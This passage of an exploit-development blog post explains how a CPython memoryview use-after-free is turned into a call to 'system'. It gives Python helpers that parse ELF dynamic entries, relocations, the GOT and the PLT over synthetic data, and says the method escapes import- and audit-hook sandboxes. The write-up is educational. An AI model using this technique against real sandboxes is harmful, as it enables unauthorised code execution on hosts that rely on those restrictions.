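        if d_tag in WANTED_TAGS:
            found[WANTED_TAGS[d_tag]] = d_val
        dyn_addr += 16

# Synthetic image: ELF header, two program headers, then .dynamic at 0x200.
ehdr = struct.pack("<16sHHIQQQIHHHHHH", b"\x7fELF\x02\x01\x01", 3, 62, 1,
                   0, 64, 0, 0, 64, 56, 2, 0, 0, 0)
phdrs = (struct.pack("<IIQQQQQQ", 1, 5, 0, 0, 0, 0x400, 0x400, 0x1000) +
         struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, 0x200, 0x200, 0x200, 0x50, 0x50, 8))
dynamic = b"".join(struct.pack("<qQ", tag, val) for tag, val in
                   [(1, 1), (12, 0x1000), (3, 0x3000), (23, 0x600), (0, 0)])
image = (ehdr + phdrs).ljust(0x200, b"\x00") + dynamic
read = lambda addr, n: image[addr:addr + n]

dyn_addr = find_dynamic(read, 0)
tags = parse_dynamic(read, dyn_addr)
print(hex(dyn_addr), tags)
```

<p>Against a real position-independent binary, <code class="language-plaintext highlighter-rouge">p_vaddr</code> is relative to the load base, so the caller would add the base found earlier before reading the dynamic entries.</p>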
<p>The key piece of information that we want to know from this is the index in the relocation table of the <code class="language-plaintext highlighter-rouge">system</code> symbol. The linker is kind enough to place GOT and PLT entries in the same order as they exist in the relocation table, which means that once we have the index of the <code class="language-plaintext highlighter-rouge">system</code> entry we can work out its address in the GOT and the address of its PLT stub.</p>
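<p>Here is a rough sketch of that relocation walk, again over synthetic tables. It assumes <code class="language-plaintext highlighter-rouge">Elf64_Rela</code> entries (24 bytes each, symbol index in the top 32 bits of <code class="language-plaintext highlighter-rouge">r_info</code>) and 24-byte <code class="language-plaintext highlighter-rouge">Elf64_Sym</code> entries. The <code class="language-plaintext highlighter-rouge">read</code> callable and the <code class="language-plaintext highlighter-rouge">count</code> parameter are hypothetical; in a real binary the entry count could be derived from <code class="language-plaintext highlighter-rouge">DT_PLTRELSZ</code>.</p>

```python
import struct

RELA_SIZE = 24  # sizeof(Elf64_Rela)
SYM_SIZE = 24   # sizeof(Elf64_Sym)

def find_reloc_index(read, jmprel, symtab, strtab, name, count):
    """Return the index of the relocation whose symbol is `name`, or None."""
    for idx in range(count):
        entry = read(jmprel + idx * RELA_SIZE, RELA_SIZE)
        r_offset, r_info, r_addend = struct.unpack("<QQq", entry)
        sym_idx = r_info >> 32                  # upper half selects the symbol
        (st_name,) = struct.unpack("<I", read(symtab + sym_idx * SYM_SIZE, 4))
        # Compare including the NUL so "system" does not match "systemd".
        if read(strtab + st_name, len(name) + 1) == name + b"\x00":
            return idx
    return None

# Synthetic tables: two relocations, for "puts" and "system".
strtab = b"\x00puts\x00system\x00"
symtab = b"".join(struct.pack("<IBBHQQ", off, 0x12, 0, 0, 0, 0)
                  for off in (0, 1, 6))
jmprel = b"".join(struct.pack("<QQq", 0x4000 + 8 * i, (sym << 32) | 7, 0)
                  for i, sym in enumerate((1, 2)))
image = jmprel.ljust(0x100, b"\x00") + symtab.ljust(0x100, b"\x00") + strtab
read = lambda addr, n: image[addr:addr + n]

system_idx = find_reloc_index(read, 0x000, 0x100, 0x200, b"system", count=2)
print(system_idx)
```

<p>The returned index is the <code class="language-plaintext highlighter-rouge">system_idx</code> used in the address calculations that follow.</p>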
<h4 id="full-relro">Full RELRO</h4>
<p>If the binary is full RELRO then we know that all of the function addresses have already been resolved. This means that we can just read the <code class="language-plaintext highlighter-rouge">system</code> address from the GOT using our arbitrary leak.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">system_addr</span> <span class="o">=</span> <span class="n">got_address</span> <span class="o">+</span> <span class="n">system_idx</span><span class="o">*</span><span class="mi">8</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">got_address</code> conveniently comes from the <code class="language-plaintext highlighter-rouge">DT_PLTGOT</code> entry in the <code class="language-plaintext highlighter-rouge">.dynamic</code> section, and <code class="language-plaintext highlighter-rouge">system_idx</code> is what we just worked out by walking the relocation table.</p>
<p>We can determine whether the binary is full RELRO or not by reading the 2nd and 3rd entries in the GOT, which would normally be the address of the link map and <code class="language-plaintext highlighter-rouge">_dl_runtime_resolve</code>, respectively. If they are both <code class="language-plaintext highlighter-rouge">0</code> then we can assume the binary is full RELRO, because the loader doesn’t waste its time setting up the resolution pointers/code in the PLT if nothing needs resolving at runtime.</p>
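<p>That check is only a few lines. The sketch below assumes 8-byte GOT entries and a hypothetical <code class="language-plaintext highlighter-rouge">read(addr, n)</code> leak function, and is exercised on two made-up GOT images rather than a live process.</p>

```python
import struct

def looks_full_relro(read, got_address):
    """Heuristic: GOT[1] and GOT[2] are both zero when nothing is lazily bound."""
    link_map, resolver = struct.unpack("<QQ", read(got_address + 8, 16))
    return link_map == 0 and resolver == 0

# Made-up GOT contents: [_DYNAMIC, link map, resolver, first function slot].
lazy_got = struct.pack("<QQQQ", 0x3E00, 0x7F0000002190, 0x7F0000015D30, 0x1036)
full_got = struct.pack("<QQQQ", 0x3E00, 0, 0, 0x7F0000050D70)

is_full_a = looks_full_relro(lambda a, n: lazy_got[a:a + n], 0)
is_full_b = looks_full_relro(lambda a, n: full_got[a:a + n], 0)
print(is_full_a, is_full_b)
```

<p>The result decides which of the two strategies is used: read the resolved address from the GOT, or jump to the PLT stub.</p>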
<h4 id="partial--no-relro">Partial / No RELRO</h4>
<p>If the binary is partial or no RELRO then the address of <code class="language-plaintext highlighter-rouge">system</code> needs to be resolved at runtime. For us this just means we will jump to the relevant PLT stub which will do the resolution and then call the function, instead of reading the function address from the GOT and calling it ourselves.</p>
<p>We can work out the address of the PLT stub like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">system_plt</span> <span class="o">=</span> <span class="n">plt_address</span> <span class="o">+</span> <span class="n">system_idx</span><span class="o">*</span><span class="n">SIZEOF_PLT_STUB</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">SIZEOF_PLT_STUB</code> is always 16 bytes, which means the only remaining unknown in this equation is the PLT address. As far as I could tell there’s no structure in an ELF which stores the address of this, which means we have to use some trickery to find it. Fortunately all of the linkers I encountered always place the PLT directly after the <code class="language-plaintext highlighter-rouge">.init</code> section, the address of which we know from the <code class="language-plaintext highlighter-rouge">DT_INIT</code> entry in the <code class="language-plaintext highlighter-rouge">.dynamic</code> section. We also know that on x86-64 the first instruction in the PLT is always of the form <code class="language-plaintext highlighter-rouge">push qword ptr [rip + offset]</code>, the opcode for which is <code class="language-plaintext highlighter-rouge">ff35</code>. So we can search past the end of the <code class="language-plaintext highlighter-rouge">.init</code> section for the <code class="language-plaintext highlighter-rouge">ff35</code> bytes, and wherever we find them is presumably the start of the PLT.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">init_data</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="n">init</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span>
<span class="n">plt_offset</span> <span class="o">=</span> <span class="bp">None</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">init_data</span><span class="p">),</span> <span class="mi">2</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">init_data</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xff\x35</span><span class="s">'</span><span class="p">:</span> <span class="c1"># push [rip+offset]
</span>        <span class="n">plt_offset</span> <span class="o">=</span> <span class="n">i</span>
        <span class="k">break</span>
</code></pre></div></div>
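<p>The search and the stub calculation can be combined into a small self-contained sketch. The helper names, the fake <code class="language-plaintext highlighter-rouge">.init</code> bytes and the addresses below are all invented for illustration. The scan also assumes, as the text does, that the first <code class="language-plaintext highlighter-rouge">ff35</code> pair found at an even offset really is the start of the PLT:</p>

```python
PLT_STUB_SIZE = 16           # size of one x86-64 PLT entry, as stated above
PUSH_RIP_REL = b"\xff\x35"   # first two bytes of `push qword ptr [rip + offset]`


def find_plt(init_address, init_data):
    """Return the presumed PLT address, or None if the marker is not found.

    init_data is assumed to be bytes leaked starting at the .init address.
    """
    for offset in range(0, len(init_data) - 1, 2):
        if init_data[offset:offset + 2] == PUSH_RIP_REL:
            return init_address + offset
    return None


def plt_stub_address(plt_address, index):
    """Address of the PLT entry with the given index."""
    return plt_address + index * PLT_STUB_SIZE


# Fake leak: 27 bytes standing in for .init code, 5 bytes of padding,
# then the first instruction of a made-up PLT.
fake_init = b"\x90" * 27 + b"\x00" * 5 + b"\xff\x35\xca\x2f\x00\x00" + b"\x00" * 26

plt = find_plt(0x1000, fake_init)
print(hex(plt))                       # 0x1020
print(hex(plt_stub_address(plt, 3)))  # 0x1050
```

<p>Returning <code class="language-plaintext highlighter-rouge">None</code> makes the "marker not found" case explicit, so a caller can bail out instead of jumping to a bogus address.</p>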
<p>If you want to follow along with the specifics of the parsing then I suggest reading the ELF <a href="https://man7.org/linux/man-pages/man5/elf.5.html">man page</a> and <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">Wikipedia</a> article, which have more information on the structures involved.</p>
<h3 id="finished-product">Finished Product</h3>
<p>Putting all of these pieces together gives us a 100% reliable exploit which works in every version of Python 3 on x86-64 Ubuntu, even with PIE, full RELRO, and CET enabled, and it requires no imports. Trying it out on Ubuntu 22.04 gives:</p>
<p style="text-align: center;"><img src="/assets/python-buffered-reader/final.png" alt="Exploit on Ubuntu 22.04" width="500" /></p>
<p>You can find the full source of the exploit on my GitHub - <a href="https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py">https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py</a>.</p>
<h2 id="so-what">So what?</h2>
<p>What’s the point of this whole thing? Can’t you just do <code class="language-plaintext highlighter-rouge">os.system(...)</code>? Well, yes.</p>
<p>Given that you need to be able to execute arbitrary Python code in the first place, this exploit won’t be useful in most settings. However, it may be useful in Python interpreters which are attempting to sandbox your code, through restricting imports or use of <a href="https://peps.python.org/pep-0578/">Audit Hooks</a>, for example. This exploit doesn’t use any imports and doesn’t create any code objects, which would fire <code class="language-plaintext highlighter-rouge">import</code> and <code class="language-plaintext highlighter-rouge">code.__new__</code> hooks, respectively. My exploit will only trigger a <code class="language-plaintext highlighter-rouge">builtins.id</code> hook event, which is much more likely to be permitted.</p>A while ago I was browsing the Python bug tracker, and I stumbled upon this bug - “memoryview to freed memory can cause segfault”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.